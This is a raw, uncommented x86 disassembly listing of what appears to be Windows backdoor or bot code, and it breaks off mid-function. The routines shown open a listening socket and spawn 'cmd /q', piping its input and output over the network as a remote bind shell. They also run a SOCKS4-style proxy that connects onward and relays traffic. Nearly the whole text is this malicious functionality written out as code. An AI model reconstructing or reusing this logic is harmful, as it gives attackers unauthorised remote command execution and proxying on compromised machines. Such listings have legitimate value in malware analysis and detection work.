var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 5A8h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_218]
rep movsd
xor esi, esi
inc esi
mov [eax+1DCh], esi
lea eax, [ebp+74h+var_5A8]
push eax
push 202h
call dword_444110 ; WSAStartup
xor edi, edi
cmp eax, edi
jz short loc_413AAC
push eax ; Args
push offset asc_434E44 ; "-"
call sub_417DE4
push [ebp+74h+var_50]
call sub_40B149
add esp, 0Ch
loc_413AA6: ; CODE XREF: sub_413A51+8D�j
push esi
jmp loc_413CCD
; ---------------------------------------------------------------------------
loc_413AAC: ; CODE XREF: sub_413A51+3D�j
push esi
push offset sub_41383E
call ds:dword_42B0C8 ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_413AE0
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax ; Args
push offset asc_434E00 ; "-"
call sub_417DE4
pop ecx
pop ecx
call dword_444224 ; WSACleanup
push [ebp+74h+var_50]
call sub_40B149
pop ecx
jmp short loc_413AA6
; ---------------------------------------------------------------------------
loc_413AE0: ; CODE XREF: sub_413A51+69�j
push 10h
pop ebx
push ebx ; Size
lea eax, [ebp+74h+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+74h+var_54]
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
push 6
push esi
push 2
mov [ebp+74h+var_22], ax
mov [ebp+74h+var_20], edi
call dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+arg_0], eax
jz loc_413C5D
mov ecx, [ebp+74h+var_50]
imul ecx, 234h
mov dword_4444F4[ecx], eax
push ebx
lea ecx, [ebp+74h+Dst]
push ecx
push eax
call dword_4441E4 ; bind
test eax, eax
jnz loc_413C5D
push 7FFFFFFFh
push [ebp+74h+arg_0]
call dword_444230 ; listen
test eax, eax
jnz loc_413C5D
push offset unk_434DC4
mov [ebp+74h+var_14], 0Ch
mov [ebp+74h+var_10], edi
mov [ebp+74h+var_C], edi
call sub_417D70
pop ecx
mov [ebp+74h+var_8], esi
jmp loc_413C3C
; ---------------------------------------------------------------------------
loc_413B77: ; CODE XREF: sub_413A51+204�j
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_8]
push eax
push 8
push 0FFFFh
push esi
call dword_444120 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_413C3C
push [ebp+74h+var_50]
movzx eax, [ebp+74h+var_32]
push eax
push [ebp+74h+var_30]
mov [ebp+74h+var_3C], edi
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Source]
push offset asc_434D80 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+74h+Source]
push eax
call sub_417D70
push esi ; int
lea eax, [ebp+74h+Source]
push 9 ; int
push eax ; Source
call sub_40AE85
mov ecx, [ebp+74h+var_50]
mov [ebp+74h+var_4C], eax
imul eax, 234h
add esp, 24h
mov dword_4444EC[eax], ecx
lea eax, [ebp+74h+var_38]
push eax
push edi
lea eax, [ebp+74h+var_218]
push eax
push offset sub_413848
push edi
lea eax, [ebp+74h+var_14]
push eax
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+74h+var_4C]
imul ecx, 234h
cmp eax, edi
mov dword_4444FC[ecx], eax
jnz short loc_413C37
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax ; Args
push offset asc_434D44 ; "-"
call sub_417DE4
pop ecx
pop ecx
jmp short loc_413C60
; ---------------------------------------------------------------------------
loc_413C2F: ; CODE XREF: sub_413A51+1E9�j
push 32h
call ds:dword_42B014 ; Sleep
loc_413C37: ; CODE XREF: sub_413A51+1C7�j
cmp [ebp+74h+var_3C], edi
jz short loc_413C2F
loc_413C3C: ; CODE XREF: sub_413A51+121�j
; sub_413A51+13E�j
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_34]
push eax
push [ebp+74h+arg_0]
mov [ebp+74h+var_4], ebx
call dword_4440BC ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz loc_413B77
jmp short loc_413C60
; ---------------------------------------------------------------------------
loc_413C5D: ; CODE XREF: sub_413A51+C7�j
; sub_413A51+EA�j ...
mov esi, [ebp+74h+arg_0]
loc_413C60: ; CODE XREF: sub_413A51+1DC�j
; sub_413A51+20A�j
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+74h+Source]
push offset asc_434D0C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_40], edi
jnz short loc_413CA0
push edi ; int
push [ebp+74h+var_44] ; int
lea eax, [ebp+74h+Source]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_218] ; int
call sub_40123B
add esp, 14h
loc_413CA0: ; CODE XREF: sub_413A51+22D�j
lea eax, [ebp+74h+Source]
push eax
call sub_417D70
pop ecx
push esi
call dword_444218 ; closesocket
push [ebp+74h+arg_0]
call dword_444218 ; closesocket
call dword_444224 ; WSACleanup
push [ebp+74h+var_50]
call sub_40B149
pop ecx
push edi
loc_413CCD: ; CODE XREF: sub_413A51+56�j
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_413A51 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413CD4 proc near ; CODE XREF: sub_413F5A+98�p
Dst = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_4], esi
call _memset
push 10h ; Size
lea eax, [ebp+var_14]
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_0]
add esp, 18h
push esi
push 1
mov [ebp+var_20], eax
push 2
lea eax, [ebp+var_18]
mov [ebp+Dst], edi
mov edi, ds:dword_42B09C
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_42B098 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+Dst]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_42B008 ; CreateProcessA
test eax, eax
jz short loc_413D8C
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_4444F0[eax], ecx
call ds:dword_42B004 ; CloseHandle
jmp short loc_413DA2
; ---------------------------------------------------------------------------
loc_413D8C: ; CODE XREF: sub_413CD4+96�j
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax ; Args
push offset asc_434E70 ; "-"
call sub_417DE4
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_413DA2: ; CODE XREF: sub_413CD4+B6�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_413CD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_413DA8 proc near ; DATA XREF: sub_414056+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 1B0h
push ebx
mov ebx, ds:dword_42B080
push esi
push edi
mov edi, [ebp+74h+arg_0]
jmp short loc_413E0A
; ---------------------------------------------------------------------------
loc_413DC1: ; CODE XREF: sub_413DA8+77�j
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+74h+arg_0], eax
jbe short loc_413DF3
loc_413DCC: ; CODE XREF: sub_413DA8+49�j
mov cl, [ebp+esi+74h+var_C8]
cmp cl, 0Ah
jnz short loc_413DE3
cmp dl, 0Dh
jz short loc_413DE3
mov [ebp+eax+74h+var_1B0], 0Dh
inc eax
loc_413DE3: ; CODE XREF: sub_413DA8+2B�j
; sub_413DA8+30�j
mov [ebp+eax+74h+var_1B0], cl
inc eax
inc esi
cmp esi, [ebp+74h+arg_0]
mov dl, cl
jb short loc_413DCC
loc_413DF3: ; CODE XREF: sub_413DA8+22�j
push 0
push eax
lea eax, [ebp+74h+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_4441A0 ; send
test eax, eax
jle short loc_413E21
loc_413E0A: ; CODE XREF: sub_413DA8+17�j
push 0
lea eax, [ebp+74h+arg_0]
push eax
push 0C8h
lea eax, [ebp+74h+var_C8]
push eax
push dword ptr [edi]
call ebx ; ReadFile
test eax, eax
jnz short loc_413DC1
loc_413E21: ; CODE XREF: sub_413DA8+60�j
mov esi, ds:dword_42B01C
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_413E3D
call esi ; RtlGetLastWin32Error
push eax ; Args
push offset asc_434EB0 ; "-"
call sub_417DE4
pop ecx
pop ecx
loc_413E3D: ; CODE XREF: sub_413DA8+84�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_413DA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_413E45 proc near ; DATA XREF: sub_414056+75�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+74h+arg_0]
xor esi, esi
mov [ebp+74h+var_10], ebx
jmp loc_413F37
; ---------------------------------------------------------------------------
loc_413E62: ; CODE XREF: sub_413E45+107�j
cmp [ebp+74h+var_10], ebx
jbe short loc_413E6F
dec [ebp+74h+var_10]
jmp loc_413F3A
; ---------------------------------------------------------------------------
loc_413E6F: ; CODE XREF: sub_413E45+20�j
mov al, byte ptr [ebp+74h+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_413F22
cmp al, 8
mov [ebp+74h+var_C], ebx
jz short loc_413ED9
cmp al, 7Fh
jz short loc_413ED9
cmp al, 3
jnz short loc_413E9A
push ebx
push ebx
call ds:dword_42B0CC ; GenerateConsoleCtrlEvent
jmp short loc_413F00
; ---------------------------------------------------------------------------
loc_413E9A: ; CODE XREF: sub_413E45+49�j
cmp al, 15h
jnz short loc_413EBC
xor esi, esi
mov [ebp+74h+var_8], 20h
mov [ebp+74h+var_7], 58h
mov [ebp+74h+var_6], 58h
mov [ebp+74h+var_5], 58h
mov [ebp+74h+var_4], 0Dh
mov [ebp+74h+var_3], 0Ah
push 6
jmp short loc_413EEC
; ---------------------------------------------------------------------------
loc_413EBC: ; CODE XREF: sub_413E45+57�j
xor ecx, ecx
mov [ebp+esi+74h+var_DC], al
inc esi
inc ecx
cmp al, 0Dh
mov [ebp+74h+var_8], al
jnz short loc_413EED
mov [ebp+esi+74h+var_DC], 0Ah
mov [ebp+74h+var_7], 0Ah
inc esi
push 2
jmp short loc_413EEC
; ---------------------------------------------------------------------------
loc_413ED9: ; CODE XREF: sub_413E45+41�j
; sub_413E45+45�j
cmp esi, ebx
jbe short loc_413F03
dec esi
mov [ebp+74h+var_8], 8
mov [ebp+74h+var_7], 20h
mov [ebp+74h+var_6], 8
push 3
loc_413EEC: ; CODE XREF: sub_413E45+75�j
; sub_413E45+92�j
pop ecx
loc_413EED: ; CODE XREF: sub_413E45+84�j
push ebx
push ecx
lea eax, [ebp+74h+var_8]
push eax
push dword ptr [edi+0Ch]
call dword_4441A0 ; send
test eax, eax
jle short loc_413F52
loc_413F00: ; CODE XREF: sub_413E45+53�j
mov al, byte ptr [ebp+74h+arg_0+3]
loc_413F03: ; CODE XREF: sub_413E45+96�j
cmp al, 0Dh
jnz short loc_413F3A
push ebx
lea eax, [ebp+74h+var_14]
push eax
push esi
lea eax, [ebp+74h+var_DC]
push eax
push dword ptr [edi+4]
call ds:dword_42B084 ; WriteFile
test eax, eax
jz short loc_413F52
xor esi, esi
jmp short loc_413F3A
; ---------------------------------------------------------------------------
loc_413F22: ; CODE XREF: sub_413E45+36�j
cmp [ebp+74h+var_C], ebx
jnz short loc_413F30
mov [ebp+74h+var_C], 1
jmp short loc_413F3A
; ---------------------------------------------------------------------------
loc_413F30: ; CODE XREF: sub_413E45+E0�j
mov [ebp+74h+var_10], 0Ah
loc_413F37: ; CODE XREF: sub_413E45+18�j
mov [ebp+74h+var_C], ebx
loc_413F3A: ; CODE XREF: sub_413E45+25�j
; sub_413E45+C0�j ...
push ebx
push 1
lea eax, [ebp+74h+arg_0+3]
push eax
push dword ptr [edi+0Ch]
call dword_444064 ; recv
test eax, eax
jg loc_413E62
loc_413F52: ; CODE XREF: sub_413E45+B9�j
; sub_413E45+D7�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_413E45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F5A proc near ; CODE XREF: sub_414056+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor edi, edi
push 18h ; Size
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call _malloc
mov esi, eax
cmp esi, edi
pop ecx
jnz short loc_413F7F
xor eax, eax
jmp loc_414052
; ---------------------------------------------------------------------------
loc_413F7F: ; CODE XREF: sub_413F5A+1C�j
push ebx
push edi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
lea ebx, [esi+4]
mov [ebx], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ds:dword_42B0A0 ; CreatePipe
test eax, eax
mov edi, ds:dword_42B004
jnz short loc_413FC0
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_434F58
jmp short loc_413FE1
; ---------------------------------------------------------------------------
loc_413FC0: ; CODE XREF: sub_413F5A+56�j
push 0
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_4]
push eax
call ds:dword_42B0A0 ; CreatePipe
test eax, eax
jnz short loc_413FE9
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax ; Args
push offset asc_434F14 ; "-"
loc_413FE1: ; CODE XREF: sub_413F5A+64�j
call sub_417DE4
pop ecx
jmp short loc_414016
; ---------------------------------------------------------------------------
loc_413FE9: ; CODE XREF: sub_413F5A+79�j
push [ebp+arg_0]
mov ebx, [ebp+var_8]
push [ebp+var_4]
call sub_413CD4
pop ecx
pop ecx
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_41404B
push offset unk_434EEC
call sub_417D70
loc_414016: ; CODE XREF: sub_413F5A+8D�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_414022
push [ebp+var_4]
call edi ; CloseHandle
loc_414022: ; CODE XREF: sub_413F5A+C1�j
cmp [ebp+var_8], 0
jz short loc_41402D
push [ebp+var_8]
call edi ; CloseHandle
loc_41402D: ; CODE XREF: sub_413F5A+CC�j
mov eax, [esi]
test eax, eax
jz short loc_414036
push eax
call edi ; CloseHandle
loc_414036: ; CODE XREF: sub_413F5A+D7�j
mov eax, [esi+4]
test eax, eax
jz short loc_414040
push eax
call edi ; CloseHandle
loc_414040: ; CODE XREF: sub_413F5A+E1�j
push esi ; Memory
call _free
pop ecx
xor eax, eax
jmp short loc_414051
; ---------------------------------------------------------------------------
loc_41404B: ; CODE XREF: sub_413F5A+B0�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_414051: ; CODE XREF: sub_413F5A+EF�j
pop ebx
loc_414052: ; CODE XREF: sub_413F5A+20�j
pop edi
pop esi
leave
retn
sub_413F5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414056 proc near ; CODE XREF: sub_413848+1B9�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_413F5A
imul edi, 234h
mov esi, eax
mov eax, dword_4444F4[edi]
mov edi, ds:dword_42B03C
xor ebx, ebx
pop ecx
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_413DA8
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_4140C5
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax ; Args
push offset asc_434FD0 ; "-"
call sub_417DE4
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
xor eax, eax
jmp loc_4141A5
; ---------------------------------------------------------------------------
loc_4140C5: ; CODE XREF: sub_414056+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_413E45
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_414106
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax ; Args
push offset asc_434FD0 ; "-"
call sub_417DE4
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_42B028 ; TerminateThread
xor eax, eax
jmp loc_4141A6
; ---------------------------------------------------------------------------
loc_414106: ; CODE XREF: sub_414056+86�j
mov eax, [esi+10h]
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
push 0FFFFFFFFh
mov [ebp+var_10], eax
push ebx
lea eax, [ebp+var_18]
push eax
push 3
call ds:dword_42B0D0 ; WaitForMultipleObjects
sub eax, ebx
jz short loc_414160
dec eax
jz short loc_41415A
dec eax
jz short loc_414146
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax ; Args
push offset asc_434F98 ; "-"
call sub_417DE4
pop ecx
pop ecx
jmp short loc_414175
; ---------------------------------------------------------------------------
loc_414146: ; CODE XREF: sub_414056+D9�j
mov edi, ds:dword_42B028
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_414175
; ---------------------------------------------------------------------------
loc_41415A: ; CODE XREF: sub_414056+D6�j
push ebx
push dword ptr [esi+10h]
jmp short loc_414164
; ---------------------------------------------------------------------------
loc_414160: ; CODE XREF: sub_414056+D3�j
push ebx
push dword ptr [esi+14h]
loc_414164: ; CODE XREF: sub_414056+108�j
call ds:dword_42B028 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_42B094 ; TerminateProcess
loc_414175: ; CODE XREF: sub_414056+EE�j
; sub_414056+102�j
push dword ptr [esi+10h]
mov edi, ds:dword_42B004
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_444218 ; closesocket
push esi ; Memory
call _free
xor eax, eax
inc eax
loc_4141A5: ; CODE XREF: sub_414056+6A�j
pop ecx
loc_4141A6: ; CODE XREF: sub_414056+AB�j
pop edi
pop esi
pop ebx
leave
retn
sub_414056 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_4141AB proc near ; CODE XREF: sub_4142A9+1F6�p
Dst = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 504h
push ebx
mov ebx, [ebp+70h+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_4141C3: ; CODE XREF: sub_4141AB+C0�j
; sub_4141AB+F0�j
xor ecx, ecx
inc ecx
mov [ebp+70h+var_100], ebx
mov [ebp+70h+var_104], ecx
xor eax, eax
loc_4141D4: ; CODE XREF: sub_4141AB+38�j
mov edx, [ebp+70h+arg_0]
cmp [ebp+eax*4+70h+var_100], edx
jz short loc_4141E5
inc eax
cmp eax, ecx
jb short loc_4141D4
loc_4141E5: ; CODE XREF: sub_4141AB+33�j
cmp eax, ecx
jnz short loc_4141F9
mov [ebp+70h+var_FC], edx
mov [ebp+70h+var_104], 2
loc_4141F9: ; CODE XREF: sub_4141AB+3C�j
push esi ; Size
lea eax, [ebp+70h+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push edi
push edi
push edi
lea eax, [ebp+70h+var_104]
push eax
push edi
call dword_4441B0 ; select
lea eax, [ebp+70h+var_104]
push eax
push ebx
call dword_44415C ; __WSAFDIsSet
test eax, eax
jz short loc_414259
push edi
push esi
lea eax, [ebp+70h+Dst]
push eax
push ebx
call dword_444064 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4142A1
push edi
push eax
lea eax, [ebp+70h+Dst]
push eax
push [ebp+70h+arg_0]
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4142A1
loc_414259: ; CODE XREF: sub_4141AB+80�j
lea eax, [ebp+70h+var_104]
push eax
push [ebp+70h+arg_0]
call dword_44415C ; __WSAFDIsSet
test eax, eax
jz loc_4141C3
push edi
push esi
lea eax, [ebp+70h+Dst]
push eax
push [ebp+70h+arg_0]
call dword_444064 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4142A1
push edi
push eax
lea eax, [ebp+70h+Dst]
push eax
push ebx
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz loc_4141C3
loc_4142A1: ; CODE XREF: sub_4141AB+95�j
; sub_4141AB+AC�j ...
pop edi
pop esi
pop ebx
add ebp, 70h
leave
retn
sub_4141AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_4142A9 proc near ; DATA XREF: sub_4144B2+142�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
Dst = byte ptr -4C8h
var_C8 = byte ptr -0C8h
Str2 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 5D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 2Ch
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_C8]
rep movsd
mov esi, [ebp+74h+var_2C]
mov [ebp+74h+arg_0], esi
imul esi, 234h
xor edi, edi
inc edi
mov [eax+0ACh], edi
mov eax, dword_4444F4[esi]
mov [ebp+74h+var_5D0], eax
xor ebx, ebx
lea eax, [ebp+74h+var_8]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_5D4]
push eax
push ebx
mov [ebp+74h+var_8], 5
mov [ebp+74h+var_4], ebx
mov [ebp+74h+var_5D4], edi
call dword_4441B0 ; select
test eax, eax
jnz short loc_41431A
push dword_4444F4[esi]
jmp loc_4143B7
; ---------------------------------------------------------------------------
loc_41431A: ; CODE XREF: sub_4142A9+64�j
push ebx
push 408h
lea eax, [ebp+74h+var_4D0]
push eax
push dword_4444F4[esi]
call dword_444064 ; recv
test eax, eax
jle short loc_4143B1
cmp [ebp+74h+var_4D0], 4
jnz short loc_4143B1
cmp [ebp+74h+var_4CF], 1
jnz short loc_4143B1
cmp [ebp+74h+Str2], bl
jz short loc_4143CD
lea eax, [ebp+74h+Str2]
push eax ; Str2
lea eax, [ebp+74h+Dst]
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_4143CD
lea eax, [ebp+74h+Str2]
push eax
lea eax, [ebp+74h+Dst]
push eax ; Args
push offset dword_43509C ; Format
call sub_417DE4
push 400h ; Size
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+74h+var_4D0], bl
mov [ebp+74h+var_4CF], 5Dh
call _memset
add esp, 18h
loc_41439B: ; CODE XREF: sub_4142A9+1B2�j
push ebx
push 8
lea eax, [ebp+74h+var_4D0]
push eax
push dword_4444F4[esi]
call dword_4441A0 ; send
loc_4143B1: ; CODE XREF: sub_4142A9+8C�j
; sub_4142A9+95�j ...
push dword_4444F4[esi]
loc_4143B7: ; CODE XREF: sub_4142A9+6C�j
call dword_444218 ; closesocket
push [ebp+74h+arg_0]
call sub_40B149
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
loc_4143CD: ; CODE XREF: sub_4142A9+A3�j
; sub_4142A9+B9�j
push 10h ; Size
lea eax, [ebp+74h+var_18]
push ebx ; Val
push eax ; Dst
call _memset
mov ax, [ebp+74h+var_4CE]
add esp, 0Ch
push 6
mov [ebp+74h+var_16], ax
mov eax, [ebp+74h+var_4CC]
push edi
push 2
mov [ebp+74h+var_18], 2
mov [ebp+74h+var_14], eax
call dword_444100 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_414416
call dword_4441C4 ; WSAGetLastError
push eax
push offset dword_43505C
jmp short loc_414434
; ---------------------------------------------------------------------------
loc_414416: ; CODE XREF: sub_4142A9+15D�j
push 10h
lea eax, [ebp+74h+var_18]
push eax
push edi
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_414460
call dword_4441C4 ; WSAGetLastError
push eax ; Args
push offset dword_435018 ; Format
loc_414434: ; CODE XREF: sub_4142A9+16B�j
call sub_417DE4
push 400h ; Size
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+74h+var_4D0], bl
mov [ebp+74h+var_4CF], 5Bh
call _memset
add esp, 14h
jmp loc_41439B
; ---------------------------------------------------------------------------
loc_414460: ; CODE XREF: sub_4142A9+17D�j
push 400h ; Size
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+74h+var_4D0], bl
mov [ebp+74h+var_4CF], 5Ah
call _memset
add esp, 0Ch
push ebx
push 8
lea eax, [ebp+74h+var_4D0]
push eax
push dword_4444F4[esi]
call dword_4441A0 ; send
push dword_4444F4[esi]
push edi
call sub_4141AB
pop ecx
pop ecx
push edi
call dword_444218 ; closesocket
jmp loc_4143B1
sub_4142A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4144B2 proc near ; DATA XREF: sub_40274D+29F6�o
Source = byte ptr -2D4h
var_D4 = dword ptr -0D4h
Str = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 2D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 10h
pop ebx
push 2Ch
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_D4]
rep movsd
xor edi, edi
inc edi
push ebx ; Size
mov [eax+0A8h], edi
xor esi, esi
lea eax, [ebp+74h+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+74h+var_4], ebx
call _memset
add esp, 0Ch
push [ebp+74h+var_40]
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
push 6
push edi
push 2
mov [ebp+74h+var_12], ax
mov [ebp+74h+var_10], esi
call dword_444100 ; socket
mov edi, eax
mov eax, [ebp+74h+var_3C]
imul eax, 234h
mov dword_4444F4[eax], edi
push ebx
lea eax, [ebp+74h+Dst]
push eax
push edi
call dword_4441E4 ; bind
test eax, eax
jnz loc_414646
push 0Ah
push edi
call dword_444230 ; listen
test eax, eax
jnz loc_414646
push [ebp+74h+var_40]
push [ebp+74h+var_D4]
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+74h+Source]
push offset asc_42ECF8 ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+74h+var_30], esi
jnz short loc_414583
push esi ; int
push [ebp+74h+var_34] ; int
lea eax, [ebp+74h+Source]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_D4] ; int
call sub_40123B
add esp, 14h
loc_414583: ; CODE XREF: sub_4144B2+B5�j
; sub_4144B2+17D�j ...
